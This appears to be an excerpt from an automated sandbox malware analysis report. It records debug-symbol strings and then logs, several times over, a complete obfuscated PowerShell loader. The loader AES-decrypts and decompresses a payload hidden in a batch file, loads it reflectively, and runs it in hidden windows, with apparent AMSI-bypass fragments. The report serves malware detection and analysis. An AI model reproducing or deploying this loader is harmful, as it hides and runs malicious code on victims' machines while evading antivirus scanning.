Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](

Obfuscated command line found

Source: unknown

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
